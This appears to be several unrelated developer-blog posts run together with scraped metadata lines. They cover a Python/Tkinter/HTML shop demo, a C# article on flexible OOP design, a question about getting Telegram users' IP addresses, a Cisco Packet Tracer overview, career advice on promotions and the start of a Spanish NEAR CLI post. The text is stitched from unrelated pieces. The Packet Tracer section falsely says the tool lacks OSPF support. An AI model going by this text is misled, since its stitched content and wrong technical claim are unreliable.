python script: ``` def main(): print("Welcome to the Shop!") # Asking for user details name = input("Please enter your name: ") age = input("Please enter your age: ") print(f"Hello {name}, welcome to our shop!") # List of vegetables and their prices vegetables = [ ("Tomato", 2.50), ("Potato", 1.20), ("Onion", 1.00), ("Carrot", 1.50), ("Broccoli", 2.80), ("Spinach", 1.75), ("Cabbage", 1.10), ("Pepper", 3.00), ("Cauliflower", 2.30), ("Mushroom", 4.00) ] # List of fashion items and their prices fashion_items = [ ("T-Shirt", 10.00), ("Jeans", 25.00), ("Jacket", 50.00), ("Skirt", 20.00), ("Dress", 40.00), ("Shoes", 30.00), ("Hat", 15.00), ("Scarf", 12.00), ("Sweater", 35.00), ("Socks", 5.00) ] # List of fruits and their prices fruits = [ ("Apple", 3.00), ("Banana", 1.50), ("Orange", 2.00), ("Grapes", 4.00), ("Pineapple", 2.50), ("Mango", 2.80), ("Strawberry", 5.00), ("Blueberry", 6.00), ("Watermelon", 3.50), ("Cherry", 7.00) ] # List of snack items and their prices snacks = [ ("Chips", 1.50), ("Cookies", 3.00), ("Candy", 2.00), ("Chocolate", 2.50), ("Popcorn", 1.80), ("Nuts", 4.50), ("Granola Bar", 2.20), ("Pretzels", 1.90), ("Crackers", 3.20), ("Trail Mix", 4.00) ] total_cost = 0 veg_cart = [] fashion_cart = [] fruit_cart = [] snack_cart = [] while True: print("\nWhat would you like to purchase today?") print("1. Vegetables") print("2. Fashion Items") print("3. Fruits") print("4. Snacks") print("0. Exit") try: category_choice = int(input("Please enter the number corresponding to your choice: ")) if category_choice == 0: break elif category_choice == 1: total_cost = shop_items("Vegetables", vegetables, veg_cart, total_cost) elif category_choice == 2: total_cost = shop_items("Fashion Items", fashion_items, fashion_cart, total_cost) elif category_choice == 3: total_cost = shop_items("Fruits", fruits, fruit_cart, total_cost) elif category_choice == 4: total_cost = shop_items("Snacks", snacks, snack_cart, total_cost) else: print("Invalid choice. Please select a valid option.") except ValueError: print("Invalid input. Please enter a number.") # Asking if the user wants to continue shopping in a different category or exit while True: continue_shopping = input("Would you like to continue shopping in a different category? (y/n): ").lower() if continue_shopping in ['y', 'n']: break else: print("Invalid input. Please enter 'y' for yes or 'n' for no.") if continue_shopping == 'n': break # Generate the invoice print_invoice(veg_cart, fashion_cart, fruit_cart, snack_cart, total_cost) def shop_items(category_name, items_list, shopping_cart, total_cost): print(f"\nHere's a list of {category_name.lower()} and their prices:") for i, (item, price) in enumerate(items_list, 1): print(f"{i}. {item}: ${price:.2f}") while True: try: choice_num = int(input(f"\nEnter the number of the {category_name.lower()} you would like to buy (type '0' to finish shopping in this category): ")) if choice_num == 0: break if 1 <= choice_num <= len(items_list): item_name, item_price = items_list[choice_num - 1] try: quantity = float(input(f"How many units of {item_name} would you like to buy? ")) cost = item_price * quantity total_cost += cost shopping_cart.append((item_name, quantity, cost)) print(f"You added {quantity} unit(s) of {item_name} costing ${cost:.2f} to your cart.") except ValueError: print("Invalid input for quantity. Please enter a valid number.") else: print(f"Invalid choice. Please enter a number between 1 and {len(items_list)}.") except ValueError: print("Invalid input. Please enter a number.") while True: more_shopping = input("Would you like to buy anything else in this category? (y/n): ").lower() if more_shopping in ['y', 'n']: break else: print("Invalid input. Please enter 'y' for yes or 'n' for no.") if more_shopping == 'n': break return total_cost def print_invoice(veg_cart, fashion_cart, fruit_cart, snack_cart, total_cost): veg_total = sum(item[2] for item in veg_cart) fashion_total = sum(item[2] for item in fashion_cart) fruit_total = sum(item[2] for item in fruit_cart) snack_total = sum(item[2] for item in snack_cart) print("\nThank you for shopping with us!") print("Here's your invoice:") if veg_cart: print("-------------------------------------------------") print(f"{'Vegetables':<15}{'Quantity (kg)':<15}{'Cost ($)':<15}") print("-------------------------------------------------") for item in veg_cart: print(f"{item[0]:<15}{item[1]:<15.2f}{item[2]:<15.2f}") print(f"{'Subtotal (Vegetables)':<30}{veg_total:.2f}") if fashion_cart: print("-------------------------------------------------") print(f"{'Fashion Items':<15}{'Quantity':<15}{'Cost ($)':<15}") print("-------------------------------------------------") for item in fashion_cart: print(f"{item[0]:<15}{item[1]:<15.2f}{item[2]:<15.2f}") print(f"{'Subtotal (Fashion)':<30}{fashion_total:.2f}") if fruit_cart: print("-------------------------------------------------") print(f"{'Fruits':<15}{'Quantity (kg)':<15}{'Cost ($)':<15}") print("-------------------------------------------------") for item in fruit_cart: print(f"{item[0]:<15}{item[1]:<15.2f}{item[2]:<15.2f}") print(f"{'Subtotal (Fruits)':<30}{fruit_total:.2f}") if snack_cart: print("-------------------------------------------------") print(f"{'Snacks':<15}{'Quantity':<15}{'Cost ($)':<15}") print("-------------------------------------------------") for item in snack_cart: print(f"{item[0]:<15}{item[1]:<15.2f}{item[2]:<15.2f}") print(f"{'Subtotal (Snacks)':<30}{snack_total:.2f}") print("-------------------------------------------------") print(f"{'Total':<30}{total_cost:.2f}") print("-------------------------------------------------") print("We hope to see you again, goodbye!") if __name__ == "__main__": main() ``` For UI Tkinter script: ``` import tkinter as tk from tkinter import messagebox def main(): root = tk.Tk() root.title("Shop Interface") root.configure(bg="#F0F8FF") # Light blue background # User Details Section tk.Label(root, text="Please enter your name:", bg="#F0F8FF", font=("Helvetica", 12)).grid(row=0, column=0, padx=10, pady=5, sticky="w") name_entry = tk.Entry(root, font=("Helvetica", 12)) name_entry.grid(row=0, column=1, padx=10, pady=5) tk.Label(root, text="Please enter your age:", bg="#F0F8FF", font=("Helvetica", 12)).grid(row=1, column=0, padx=10, pady=5, sticky="w") age_entry = tk.Entry(root, font=("Helvetica", 12)) age_entry.grid(row=1, column=1, padx=10, pady=5) # Categories List categories = ["Vegetables", "Fashion Items", "Fruits", "Snacks"] items = { "Vegetables": [ ("Tomato", 2.50), ("Potato", 1.20), ("Onion", 1.00), ("Carrot", 1.50), ("Broccoli", 2.80), ("Spinach", 1.75), ("Cabbage", 1.10), ("Pepper", 3.00), ("Cauliflower", 2.30), ("Mushroom", 4.00) ], "Fashion Items": [ ("T-Shirt", 10.00), ("Jeans", 25.00), ("Jacket", 50.00), ("Skirt", 20.00), ("Dress", 40.00), ("Shoes", 30.00), ("Hat", 15.00), ("Scarf", 12.00), ("Sweater", 35.00), ("Socks", 5.00) ], "Fruits": [ ("Apple", 3.00), ("Banana", 1.50), ("Orange", 2.00), ("Grapes", 4.00), ("Pineapple", 2.50), ("Mango", 2.80), ("Strawberry", 5.00), ("Blueberry", 6.00), ("Watermelon", 3.50), ("Cherry", 7.00) ], "Snacks": [ ("Chips", 1.50), ("Cookies", 3.00), ("Candy", 2.00), ("Chocolate", 2.50), ("Popcorn", 1.80), ("Nuts", 4.50), ("Granola Bar", 2.20), ("Pretzels", 1.90), ("Crackers", 3.20), ("Trail Mix", 4.00) ] } # Function to add items to cart def add_to_cart(): category = category_var.get() item = item_var.get() quantity = quantity_var.get() if not category or not item or not quantity: messagebox.showerror("Input Error", "Please fill in all fields.") return try: quantity = float(quantity) item_name, item_price = item.split(": $") item_price = float(item_price) cost = item_price * quantity cart.append((category, item_name, quantity, cost)) messagebox.showinfo("Added to Cart", f"Added {quantity} unit(s) of {item_name} costing ${cost:.2f} to your cart.") except ValueError: messagebox.showerror("Input Error", "Please enter a valid quantity.") # Function to generate invoice def generate_invoice(): if not cart: messagebox.showwarning("Empty Cart", "Your cart is empty.") return total_cost = sum(item[3] for item in cart) invoice_window = tk.Toplevel(root) invoice_window.title("Invoice") invoice_window.configure(bg="#FFFACD") # Light golden background tk.Label(invoice_window, text=f"Name: {name_entry.get()}", bg="#FFFACD", font=("Helvetica", 12)).pack(padx=10, pady=5) tk.Label(invoice_window, text=f"Age: {age_entry.get()}", bg="#FFFACD", font=("Helvetica", 12)).pack(padx=10, pady=5) tk.Label(invoice_window, text="Your Invoice:", bg="#FFFACD", font=("Helvetica", 14, "bold")).pack(padx=10, pady=5) for category in categories: category_items = [item for item in cart if item[0] == category] if category_items: tk.Label(invoice_window, text=f"--- {category} ---", bg="#FFFACD", font=("Helvetica", 12, "italic")).pack(padx=10, pady=5) for item in category_items: tk.Label(invoice_window, text=f"{item[1]}: {item[2]} units, ${item[3]:.2f}", bg="#FFFACD", font=("Helvetica", 12)).pack(padx=10, pady=2) tk.Label(invoice_window, text=f"Total: ${total_cost:.2f}", bg="#FFFACD", font=("Helvetica", 14, "bold")).pack(padx=10, pady=10) tk.Button(invoice_window, text="Close", command=invoice_window.destroy, bg="#FFD700", font=("Helvetica", 12)).pack(pady=10) cart = [] category_var = tk.StringVar() item_var = tk.StringVar() quantity_var = tk.StringVar() # Dropdown for categories tk.Label(root, text="Select Category:", bg="#F0F8FF", font=("Helvetica", 12)).grid(row=2, column=0, padx=10, pady=5, sticky="w") category_menu = tk.OptionMenu(root, category_var, *categories) category_menu.grid(row=2, column=1, padx=10, pady=5) category_menu.config(bg="#E6E6FA", font=("Helvetica", 12)) # Lavender background # Function to update items based on selected category def update_items(*args): category = category_var.get() if category: items_list = [f"{name}: ${price:.2f}" for name, price in items[category]] item_menu["menu"].delete(0, "end") for item in items_list: item_menu["menu"].add_command(label=item, command=tk._setit(item_var, item)) category_var.trace("w", update_items) # Dropdown for items tk.Label(root, text="Select Item:", bg="#F0F8FF", font=("Helvetica", 12)).grid(row=3, column=0, padx=10, pady=5, sticky="w") item_menu = tk.OptionMenu(root, item_var, "") item_menu.grid(row=3, column=1, padx=10, pady=5) item_menu.config(bg="#E6E6FA", font=("Helvetica", 12)) # Lavender background # Quantity input tk.Label(root, text="Enter Quantity:", bg="#F0F8FF", font=("Helvetica", 12)).grid(row=4, column=0, padx=10, pady=5, sticky="w") tk.Entry(root, textvariable=quantity_var, font=("Helvetica", 12)).grid(row=4, column=1, padx=10, pady=5) # Buttons for adding to cart and generating invoice tk.Button(root, text="Add to Cart", command=add_to_cart, bg="#7FFFD4", font=("Helvetica", 12)).grid(row=5, column=0, padx=10, pady=10) tk.Button(root, text="Generate Invoice", command=generate_invoice, bg="#7FFFD4", font=("Helvetica", 12)).grid(row=5, column=1, padx=10, pady=10) root.mainloop() if __name__ == "__main__": main() ``` ``` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Welcome to Our Shopping Store</title> <style> body { font-family: Arial, sans-serif; margin: 20px; } .container { max-width: 600px; margin: auto; text-align: center; } .btn { display: inline-block; padding: 10px 20px; margin: 10px; font-size: 16px; cursor: pointer; background-color: #007bff; color: white; border: none; border-radius: 5px; text-decoration: none; } .btn:hover { background-color: #b3001e; } .hidden { display: none; } /* Background Colors for Sections */ #welcome { background-color: #007bff; /* Blue */ color: white; padding: 20px; border-radius: 10px; margin-bottom: 20px; } #registration { background-color: #28a745; /* Green */ color: white; padding: 20px; border-radius: 10px; margin-bottom: 20px; } #login { background-color: #ffc107; /* Yellow */ color: black; padding: 20px; border-radius: 10px; margin-bottom: 20px; } #shopping { background-color: #dc3545; /* Red */ color: white; padding: 20px; border-radius: 10px; margin-bottom: 20px; } </style> </head> <body> <div class="container"> <!-- Welcome Section --> <div id="welcome"> <h1>Hello My Dear Customer!</h1> <h2>Welcome to Our Shopping Store</h2> <button class="btn" onclick="showRegistration()">New User</button> <button class="btn" onclick="showLogin()">Existing User</button> </div> <!-- Registration Section --> <div id="registration" class="hidden"> <h3>New User Registration</h3> <form id="registrationForm"> <label for="username">Username:</label><br> <input type="text" id="username" name="username" required><br><br> <label for="gender">Gender:</label><br> <select id="gender" name="gender" required> <option value="">Select Gender</option> <option value="male">Male</option> <option value="female">Female</option> <option value="transgender">Transgender</option> <option value="not_specified">Don't Want to Tell</option> </select><br><br> <label for="age">Age:</label><br> <input type="number" id="age" name="age" min="0" max="100" required><br><br> <label for="password">Password:</label><br> <input type="password" id="password" name="password" required><br><br> <button type="submit" class="btn">Register</button> </form> </div> <!-- Login Section --> <div id="login" class="hidden"> <h3>Existing User Login</h3> <form id="loginForm"> <label for="existingUsername">Username:</label><br> <input type="text" id="existingUsername" name="existingUsername" required><br><br> <label for="existingPassword">Password:</label><br> <input type="password" id="existingPassword" name="existingPassword" required><br><br> <button type="submit" class="btn">Login</button> </form> </div> <!-- Shopping Section --> <div id="shopping" class="hidden"> <h3>Please Start Your Shopping</h3> <button class="btn" onclick="backToWelcome()">Back to Welcome</button> <!-- Additional shopping content can go here --> </div> </div> <script> function showRegistration() { document.getElementById('welcome').style.display = 'none'; document.getElementById('registration').style.display = 'block'; document.getElementById('shopping').style.display = 'none'; } function showLogin() { document.getElementById('welcome').style.display = 'none'; document.getElementById('login').style.display = 'block'; document.getElementById('shopping').style.display = 'none'; } function backToWelcome() { document.getElementById('welcome').style.display = 'block'; document.getElementById('registration').style.display = 'none'; document.getElementById('login').style.display = 'none'; document.getElementById('shopping').style.display = 'none'; } document.getElementById('registrationForm').addEventListener('submit', function(event) { event.preventDefault(); // Here you can handle the registration form submission with JavaScript or send it to a backend server document.getElementById('registration').style.display = 'none'; document.getElementById('shopping').style.display = 'block'; }); document.getElementById('loginForm').addEventListener('submit', function(event) { event.preventDefault(); // Here you can handle the login form submission with JavaScript or send it to a backend server document.getElementById('login').style.display = 'none'; document.getElementById('shopping').style.display = 'block'; }); </script> </body> </html> ```
venkyy8
1,907,016
Designing Flexible and Extensible Software Systems with OOP
The key objective of good object-oriented design is to create software that's easy to maintain and...
0
2024-07-01T00:46:00
https://dev.to/muhammad_salem/designing-flexible-and-extensible-software-systems-with-oop-3a28
The **key objective of good object-oriented design** is to create software that's easy to maintain and adapt over time. This translates to designing code that has a **low cost of change**. Here's why this is important: * Imagine you build a complex system with poorly designed objects. Adding new features or fixing bugs later becomes a challenge because everything is tightly coupled. Changes in one part of the code **ripple** through the entire system, requiring significant rewrites. This is achieved by focusing on: * **Modularity:** Breaking down the system into independent, reusable objects that encapsulate data (attributes) and the operations (methods) that can be performed on that data. * **Loose Coupling:** Minimizing the dependencies between objects. Ideally, objects should only rely on the interfaces of other objects, not their specific implementations. This makes the code more flexible and easier to modify. * **High Cohesion:** Ensuring that each object has a clear and well-defined responsibility. Its methods should all work together towards a single purpose. By following these principles, good object-oriented design creates a system that's: * **Maintainable:** Easier to understand, modify, and debug as requirements change. * **Reusable:** Objects can be reused in different parts of the program or even in other applications. * **Scalable:** The system can be easily extended to accommodate new features or functionality. In essence, good object-oriented design aims for **flexibility and reusability**. You want your objects to be **well-defined building blocks that can be easily modified or extended to meet new requirements** . Let's dive into the principles and techniques for designing flexible and extensible software systems using object-oriented programming (OOP). I'll provide a detailed explanation followed by a comprehensive example This article explores key principles and techniques in object-oriented programming (OOP) that enable developers to design flexible and extensible software systems, with a focus on C# and the .NET Core ecosystem. Key Principles and Techniques: 1. SOLID Principles: - Single Responsibility Principle (SRP) - Open-Closed Principle (OCP) - Liskov Substitution Principle (LSP) - Interface Segregation Principle (ISP) - Dependency Inversion Principle (DIP) 2. Design Patterns: - Strategy Pattern - Factory Method Pattern - Observer Pattern - Decorator Pattern 3. Dependency Injection (DI) and Inversion of Control (IoC) 4. Interface-based Programming 5. Modular Architecture 6. Extension Methods 7. Generics Let's explore these concepts through a practical example: an e-commerce order processing system that needs to accommodate various payment methods and shipping providers. Example: Flexible E-commerce Order Processing System We'll build an ASP.NET Core Web API that processes orders with different payment methods and shipping providers. The system should be easily extensible to add new payment methods and shipping providers without modifying existing code. Step 1: Define Interfaces First, let's define interfaces for our core components: ```csharp public interface IPaymentProcessor { Task<bool> ProcessPaymentAsync(Order order); } public interface IShippingProvider { Task<ShippingLabel> CreateShippingLabelAsync(Order order); } public interface IOrderProcessor { Task<OrderResult> ProcessOrderAsync(Order order); } ``` Step 2: Implement Concrete Classes Now, let's implement concrete classes for different payment methods and shipping providers: ```csharp public class CreditCardPaymentProcessor : IPaymentProcessor { public async Task<bool> ProcessPaymentAsync(Order order) { // Credit card payment processing logic return true; } } public class PayPalPaymentProcessor : IPaymentProcessor { public async Task<bool> ProcessPaymentAsync(Order order) { // PayPal payment processing logic return true; } } public class FedExShippingProvider : IShippingProvider { public async Task<ShippingLabel> CreateShippingLabelAsync(Order order) { // FedEx shipping label creation logic return new ShippingLabel { /* ... */ }; } } public class UPSShippingProvider : IShippingProvider { public async Task<ShippingLabel> CreateShippingLabelAsync(Order order) { // UPS shipping label creation logic return new ShippingLabel { /* ... */ }; } } ``` Step 3: Implement the Order Processor Now, let's implement the `OrderProcessor` class using dependency injection: ```csharp public class OrderProcessor : IOrderProcessor { private readonly IPaymentProcessor _paymentProcessor; private readonly IShippingProvider _shippingProvider; public OrderProcessor(IPaymentProcessor paymentProcessor, IShippingProvider shippingProvider) { _paymentProcessor = paymentProcessor; _shippingProvider = shippingProvider; } public async Task<OrderResult> ProcessOrderAsync(Order order) { var paymentResult = await _paymentProcessor.ProcessPaymentAsync(order); if (!paymentResult) { return new OrderResult { Success = false, Message = "Payment failed" }; } var shippingLabel = await _shippingProvider.CreateShippingLabelAsync(order); // Additional order processing logic... return new OrderResult { Success = true, ShippingLabel = shippingLabel }; } } ``` Step 4: Configure Dependency Injection In the `Startup.cs` file, configure the dependency injection: ```csharp public void ConfigureServices(IServiceCollection services) { services.AddControllers(); services.AddScoped<IPaymentProcessor, CreditCardPaymentProcessor>(); services.AddScoped<IShippingProvider, FedExShippingProvider>(); services.AddScoped<IOrderProcessor, OrderProcessor>(); } ``` Step 5: Create the API Controller Now, let's create an API controller to handle order processing: ```csharp [ApiController] [Route("api/[controller]")] public class OrderController : ControllerBase { private readonly IOrderProcessor _orderProcessor; public OrderController(IOrderProcessor orderProcessor) { _orderProcessor = orderProcessor; } [HttpPost] public async Task<IActionResult> ProcessOrder([FromBody] Order order) { var result = await _orderProcessor.ProcessOrderAsync(order); if (result.Success) { return Ok(result); } return BadRequest(result); } } ``` Step 6: Implement a Factory for Dynamic Provider Selection To make our system even more flexible, let's implement a factory that can dynamically select payment processors and shipping providers based on the order details: ```csharp public interface IPaymentProcessorFactory { IPaymentProcessor CreatePaymentProcessor(string paymentMethod); } public interface IShippingProviderFactory { IShippingProvider CreateShippingProvider(string shippingMethod); } public class PaymentProcessorFactory : IPaymentProcessorFactory { private readonly IServiceProvider _serviceProvider; public PaymentProcessorFactory(IServiceProvider serviceProvider) { _serviceProvider = serviceProvider; } public IPaymentProcessor CreatePaymentProcessor(string paymentMethod) { return paymentMethod.ToLower() switch { "creditcard" => _serviceProvider.GetRequiredService<CreditCardPaymentProcessor>(), "paypal" => _serviceProvider.GetRequiredService<PayPalPaymentProcessor>(), _ => throw new ArgumentException($"Unsupported payment method: {paymentMethod}") }; } } public class ShippingProviderFactory : IShippingProviderFactory { private readonly IServiceProvider _serviceProvider; public ShippingProviderFactory(IServiceProvider serviceProvider) { _serviceProvider = serviceProvider; } public IShippingProvider CreateShippingProvider(string shippingMethod) { return shippingMethod.ToLower() switch { "fedex" => _serviceProvider.GetRequiredService<FedExShippingProvider>(), "ups" => _serviceProvider.GetRequiredService<UPSShippingProvider>(), _ => throw new ArgumentException($"Unsupported shipping method: {shippingMethod}") }; } } ``` Step 7: Update the Order Processor to Use Factories Now, let's update the `OrderProcessor` to use these factories: ```csharp public class OrderProcessor : IOrderProcessor { private readonly IPaymentProcessorFactory _paymentProcessorFactory; private readonly IShippingProviderFactory _shippingProviderFactory; public OrderProcessor(IPaymentProcessorFactory paymentProcessorFactory, IShippingProviderFactory shippingProviderFactory) { _paymentProcessorFactory = paymentProcessorFactory; _shippingProviderFactory = shippingProviderFactory; } public async Task<OrderResult> ProcessOrderAsync(Order order) { var paymentProcessor = _paymentProcessorFactory.CreatePaymentProcessor(order.PaymentMethod); var shippingProvider = _shippingProviderFactory.CreateShippingProvider(order.ShippingMethod); var paymentResult = await paymentProcessor.ProcessPaymentAsync(order); if (!paymentResult) { return new OrderResult { Success = false, Message = "Payment failed" }; } var shippingLabel = await shippingProvider.CreateShippingLabelAsync(order); // Additional order processing logic... return new OrderResult { Success = true, ShippingLabel = shippingLabel }; } } ``` Step 8: Update Dependency Injection Configuration Finally, update the `Startup.cs` file to include the new factories: ```csharp public void ConfigureServices(IServiceCollection services) { services.AddControllers(); services.AddScoped<CreditCardPaymentProcessor>(); services.AddScoped<PayPalPaymentProcessor>(); services.AddScoped<FedExShippingProvider>(); services.AddScoped<UPSShippingProvider>(); services.AddScoped<IPaymentProcessorFactory, PaymentProcessorFactory>(); services.AddScoped<IShippingProviderFactory, ShippingProviderFactory>(); services.AddScoped<IOrderProcessor, OrderProcessor>(); } ``` This comprehensive example demonstrates several key principles and techniques for creating flexible and extensible software systems: 1. SOLID Principles: The design adheres to SRP (each class has a single responsibility), OCP (new payment methods and shipping providers can be added without modifying existing code), LSP (different implementations can be substituted without affecting the system), ISP (interfaces are specific to their use cases), and DIP (high-level modules depend on abstractions). 2. Design Patterns: We've used the Strategy Pattern (for payment processing and shipping) and the Factory Method Pattern (for creating appropriate processors and providers). 3. Dependency Injection: The system uses constructor injection to provide dependencies, making it more modular and testable. 4. Interface-based Programming: All major components are defined by interfaces, allowing for easy substitution and extension. 5. Modular Architecture: The system is composed of loosely coupled modules that can be easily replaced or extended. By following these principles and techniques, we've created a system that can easily accommodate new payment methods and shipping providers with minimal code changes. To add a new payment method or shipping provider, you would simply: 1. Create a new class implementing the appropriate interface (IPaymentProcessor or IShippingProvider). 2. Add the new class to the dependency injection container in Startup.cs. 3. Update the corresponding factory to return an instance of the new class for the appropriate method. This approach allows the system to be extended without modifying existing code, adhering to the Open-Closed Principle and making the system more maintainable and adaptable to changing requirements. In conclusion, by applying these OOP principles and techniques, we can create flexible and extensible software systems that can easily accommodate new requirements with minimal code changes. This approach leads to more maintainable, testable, and scalable applications that can evolve with changing business needs.
muhammad_salem
1,907,015
Advanced Networking Concepts with Cisco Packet Tracer
Introduction In today’s digital era, networking plays a crucial role in connecting...
0
2024-07-01T00:38:12
https://dev.to/kartikmehta8/advanced-networking-concepts-with-cisco-packet-tracer-35bc
javascript, beginners, programming, tutorial
## Introduction In today’s digital era, networking plays a crucial role in connecting different devices and enabling communication between them. Cisco Packet Tracer is a powerful simulation tool used to design, configure, and troubleshoot networks. It provides a practical learning experience for advanced networking concepts. In this article, we will discuss the advantages, disadvantages, and features of Cisco Packet Tracer. ## Advantages of Cisco Packet Tracer One of the significant advantages of using Cisco Packet Tracer is its user-friendly interface. It allows users to simulate networks with ease, making it suitable for beginners and experts alike. It also provides a cost-effective solution for network experimentation without the need for physical network equipment. Cisco Packet Tracer offers a vast range of predefined network devices, allowing for the creation of complex network topologies. Additionally, it offers real-time network simulation, enabling students to apply theoretical knowledge in a practical setting. ## Disadvantages of Cisco Packet Tracer The main disadvantage of using Cisco Packet Tracer is its limited support for advanced networking protocols. It lacks support for some essential protocols, such as BGP and OSPF, making it less suitable for advanced networking practices. Another drawback is that it is not a real-world simulation, and therefore, it may not accurately represent network behavior in real-time scenarios. ## Features of Cisco Packet Tracer Cisco Packet Tracer offers various features that make it an ideal tool for advanced networking concepts. It provides a dynamic workspace that allows drag and drop of network devices and allows for real-time configuration and monitoring of networks. It also facilitates the creation of network troubleshooting scenarios, allowing students to practice and enhance their skills. ### Example of Creating a Simple Network in Cisco Packet Tracer ```plaintext 1. Open Cisco Packet Tracer. 2. Drag and drop a router and two switches from the bottom device menu. 3. Connect the devices using the automatic connection type. 4. Assign IP addresses to each device through the GUI. 5. Test connectivity using the simulation mode. ``` This example demonstrates the basic steps to create a simple network topology in Cisco Packet Tracer, highlighting the ease of use and practical application of networking concepts. ## Conclusion In conclusion, Cisco Packet Tracer is an efficient tool for learning and practicing advanced networking concepts. Its user-friendly interface, cost-effectiveness, and practical learning experience make it a popular choice among students and networking professionals. However, its limited support for advanced protocols and lack of real-world simulation may be considered as its drawbacks. Overall, Cisco Packet Tracer is a valuable resource for anyone looking to gain practical knowledge in the field of networking.
kartikmehta8
1,907,014
[Help] [Telegram Bot] Can I get the user IP address with telegram bot?
I am an experienced blockchain &amp; telegram bot developer and now in progress of developing a...
0
2024-07-01T00:36:19
https://dev.to/dev188007/help-telegram-bot-can-i-get-the-user-ip-address-with-telegram-bot-ke5
help
I am an experienced blockchain & telegram bot developer and now in progress of developing a telegram bot. I need to implement a feature that bans the users of specific locations with IP address. Furthermore, I want to know it is possible to get the IP address with telegram bot. Looking forward to your advice. Thanks.
dev188007
1,907,013
Rise of Tianjin Golden Incalcu Bicycle Co., Ltd: A Success Story
GI, as Tianjin Golden Incalcu Bicycle Co., Ltd also known for many years in the world of bicycles...
0
2024-07-01T00:34:54
https://dev.to/hdhx_dgshch_38a71c0f89609/rise-of-tianjin-golden-incalcu-bicycle-co-ltd-a-success-story-1k4h
GI, as Tianjin Golden Incalcu Bicycle Co., Ltd also known for many years in the world of bicycles before GI became a worldwide brand because they are one extreme example how to established themselves among worlds top innovators and manufacturers. GI, one of the largest bicycle manufacturers in the world exports CRUs (bicycle parts as well) and CBU to about 180 countries. Advantages of GI Bicycles GI bikes are state of the art, economical and tough. The Commuter Bikes are offered in numerous designs, colours and models to match the preferences of specific users. No matter you are professional athlete or casual bike lover GI bicycles will make the best fit for your need. Innovation in GI Bicycles The GI bicycles Products are manufactured in a cutting edge facility that uses high-quality aluminum alloys and other materials to create some of the most durable, lightweight bikes. It also ensures that the bicycle parts are accurate, ensuring a comfortable and efficient cycling experience. GI holds a number of patents for their innovation, and the company is still working to invent more innovations so that they can keep making great product. Safety of GI Bicycles Safety is of the utmost importance to GI when constructing a bike. With these we have very strict QC control quality, each single bicycle part must to be examine together before assembly. Bicycles of GI are loaded with many good safety features. The brakes, for instance, perform well allowing the bike to stop quickly and safely if need be. The bikes also come with easy-grip handles, so that the rider can keep a tight grip on them for better stability and performance. How to Use GI Bicycles After all, the GI bicycles Electric Mountain Bikes are easy to use and even a child will quickly understand how they work. Great instructions and labeling of the bikes help to assemble and maintain them easily. When you are riding a GI bike, be sure to wear your helmet and knee pads as well when cycling is another great way to avoid getting hurt. Also, it is necessary to obey the road traffic regulations while riding in specified bike lanes or paths for preventing accidents and collisions with other vehicles. GI Service GI being able to provide superior service towards its customers includes Technical support, Product warranty as well after sales-support. Which means if there is an issue you have with your bike, it gets reported to the customer service team at GI and they can address all of these issues that may arise. GI Quality GI manufactures high-quality Kazon bicycles and ensures their endurance by further testing. As part of the quality control measures, GI ensures that each component in its bicycle is stringently tested and inspected before it goes into a final product. Their efforts have produced an impressive line of bicycles that has earned a number of prestigious industry awards across the globe. Application of GI Bicycles You can ride a GI bicycle for transportation or sport/leisure/recreation, as needed. With the variety in their product range, there is a GI cycle for everyone of you no matter what your cycling needs are.
hdhx_dgshch_38a71c0f89609
1,907,012
Why you didn't get that promotion
Despite stellar results and glowing reviews, you got passed over for a promotion. You’ve asked where...
0
2024-07-01T00:33:54
https://dev.to/gretchen/why-you-didnt-get-that-promotion-39el
beginners, learning, career, softwareengineering
Despite stellar results and glowing reviews, you got passed over for a promotion. You’ve asked where you’re falling short, but the responses have been vague and unsatisfying, leaving you angry, frustrated, and unsure of how to get ahead. Promotion decisions seem arbitrary and political. What’s going on? ## The Unwritten Rules In most organisations, promotions are governed by unwritten rules—the often vague, intuitive, and poorly expressed feelings of seniors regarding individuals’ ability to succeed in higher positions. You might not know those rules, much less the specific skills you need to develop or demonstrate to follow them. At the end of the day, you’re left to your own devices in interpreting feedback and finding a way to achieve your career goals. ## Strategies for Securing a Promotion 1. Get in the Driver’s Seat Early On - Set Clear Goals: Share your goals with your manager regularly, not just at promotion time. - Align on Strengths and Weaknesses: Identify areas for improvement, ones that align with the organisations aspirations and work hard on them. - Regular Updates: Measure your progress and share weekly or fortnightly updates with your manager. 2. Think and Act at the Next Level - Mindset Shift: Start acting as if you already have the promotion. - Take Ownership: Engage with projects that align with higher-level responsibilities if you can. This might take some time to set up and make happen. - Cross-Team Impact: Work across teams to have more impact and increase visibility. 3. Take on Challenging Projects - Beyond Current Role: Seek out projects that go beyond your current responsibilities. - Next Level Scope: Look for opportunities that challenge you and help you grow. 4. Build Trust with Leadership - Manage Up: Provide updates and manage expectations proactively. Sometimes things don’t go to plan, if tasks are falling behind, then let your manager know in advance. - Reliable and Trustworthy: Demonstrate reliability and ownership of projects. 5. Leverage Mentorship and Growth-Minded Peers - Direct Mentorship: Seek out mentors who have successfully navigated the path you aim to follow. - Work with Top Performers: Join projects with high performers to learn from their experience and thinking. ## Addressing Vague Feedback When receiving vague feedback, it’s crucial to ask specific questions to uncover the underlying issues: - Ask for Specifics: “What skills and capabilities do I need to demonstrate to be a strong candidate for higher responsibility?” - Active Listening: Avoid defensiveness and ask clarifying questions. - Identify Core Issues: Look for underlying concerns masked by general terms like “leadership” or “communication skills.” ## Final Thoughts Navigating the path to promotion is nuanced and requires understanding and addressing the unwritten rules of your organisation. Given that these are unwritten, it can be challenging to understand them. Setting clear goals, taking on challenging projects, managing up, and seeking mentorship, you can start to work strategically towards your next promotion. Focus on the key areas of development relevant to higher-level roles and be proactive in demonstrating your readiness for advancement. If all of these things don’t lead to a promotion at your current organisation, don’t stress - you’re setting yourself up with new skills that open up new opportunities. Find a way to track your goals and progress that works for you. [Kaleida for developers](https://www.kaleida.team/why-kaleida/for-developers) could be helpful. You can find me on [LinkedIn](https://www.linkedin.com/in/gretchscott/)
gretchen
1,876,902
Primeros pasos con cliente de NEAR escrito en RUST NEAR-CLI-RS 😎
En el mundo de las programación es muy importante contar con una herramienta que nos facilite en...
0
2024-07-01T00:25:28
https://dev.to/sergiotechx/primeros-pasos-con-cliente-de-near-escrito-en-rust-near-cli-rs-4amn
